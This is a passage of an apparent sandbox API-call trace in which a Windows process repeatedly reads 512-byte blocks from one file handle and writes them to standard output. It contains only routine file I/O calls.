[0218.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.173] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.173] GetFileType (hFile=0x50) returned 0x1 [0218.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.173] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.173] GetFileType (hFile=0x50) returned 0x1 [0218.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.173] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.173] GetFileType (hFile=0x50) returned 0x1 [0218.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.173] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.173] GetFileType (hFile=0x50) returned 0x1 [0218.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.173] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.173] GetFileType (hFile=0x50) returned 0x1 [0218.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.173] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.173] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.173] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.173] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.173] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.173] GetFileType (hFile=0x50) returned 0x1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] GetFileType (hFile=0x50) returned 0x1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] GetFileType (hFile=0x50) returned 0x1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] GetFileType (hFile=0x50) returned 0x1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] GetFileType (hFile=0x50) returned 0x1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] GetFileType (hFile=0x50) returned 0x1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] GetFileType (hFile=0x50) returned 0x1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] GetFileType (hFile=0x50) returned 0x1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.174] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.174] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.175] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.175] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] GetFileType (hFile=0x50) returned 0x1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] GetFileType (hFile=0x50) returned 0x1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] GetFileType (hFile=0x50) returned 0x1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] GetFileType (hFile=0x50) returned 0x1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] GetFileType (hFile=0x50) returned 0x1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] GetFileType (hFile=0x50) returned 0x1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] GetFileType (hFile=0x50) returned 0x1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] GetFileType (hFile=0x50) returned 0x1 [0218.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.176] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.176] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.176] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.176] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.176] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.176] GetFileType (hFile=0x50) returned 0x1 [0218.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.176] GetFileType (hFile=0x50) returned 0x1 [0218.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.176] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.176] GetFileType (hFile=0x50) returned 0x1 [0218.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.176] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.176] GetFileType (hFile=0x50) returned 0x1 [0218.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.176] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.176] GetFileType (hFile=0x50) returned 0x1 [0218.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.176] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.176] GetFileType (hFile=0x50) returned 0x1 [0218.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.176] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.177] GetFileType (hFile=0x50) returned 0x1 [0218.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.177] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.177] GetFileType (hFile=0x50) returned 0x1 [0218.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.177] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.177] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.177] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.177] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.177] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.177] GetFileType (hFile=0x50) returned 0x1 [0218.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.177] GetFileType (hFile=0x50) returned 0x1 [0218.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.177] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.177] GetFileType (hFile=0x50) returned 0x1 [0218.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.177] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.177] GetFileType (hFile=0x50) returned 0x1 [0218.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.177] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.177] GetFileType (hFile=0x50) returned 0x1 [0218.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.177] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] GetFileType (hFile=0x50) returned 0x1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] GetFileType (hFile=0x50) returned 0x1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] GetFileType (hFile=0x50) returned 0x1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.178] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.178] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.178] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.178] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] GetFileType (hFile=0x50) returned 0x1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] GetFileType (hFile=0x50) returned 0x1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] GetFileType (hFile=0x50) returned 0x1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] GetFileType (hFile=0x50) returned 0x1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] GetFileType (hFile=0x50) returned 0x1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.179] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.179] GetFileType (hFile=0x50) returned 0x1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.179] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.179] GetFileType (hFile=0x50) returned 0x1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.179] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.179] GetFileType (hFile=0x50) returned 0x1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.179] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.179] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.179] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.179] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.179] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.179] GetFileType (hFile=0x50) returned 0x1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.179] GetFileType (hFile=0x50) returned 0x1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.179] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.179] GetFileType (hFile=0x50) returned 0x1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.179] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.179] GetFileType (hFile=0x50) returned 0x1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.180] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.180] GetFileType (hFile=0x50) returned 0x1 [0218.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.180] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.180] GetFileType (hFile=0x50) returned 0x1 [0218.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.180] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.180] GetFileType (hFile=0x50) returned 0x1 [0218.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.180] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.180] GetFileType (hFile=0x50) returned 0x1 [0218.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.180] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.180] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.180] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.180] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.180] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.180] GetFileType (hFile=0x50) returned 0x1 [0218.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.180] GetFileType (hFile=0x50) returned 0x1 [0218.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.180] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] GetFileType (hFile=0x50) returned 0x1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] GetFileType (hFile=0x50) returned 0x1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] GetFileType (hFile=0x50) returned 0x1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] GetFileType (hFile=0x50) returned 0x1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] GetFileType 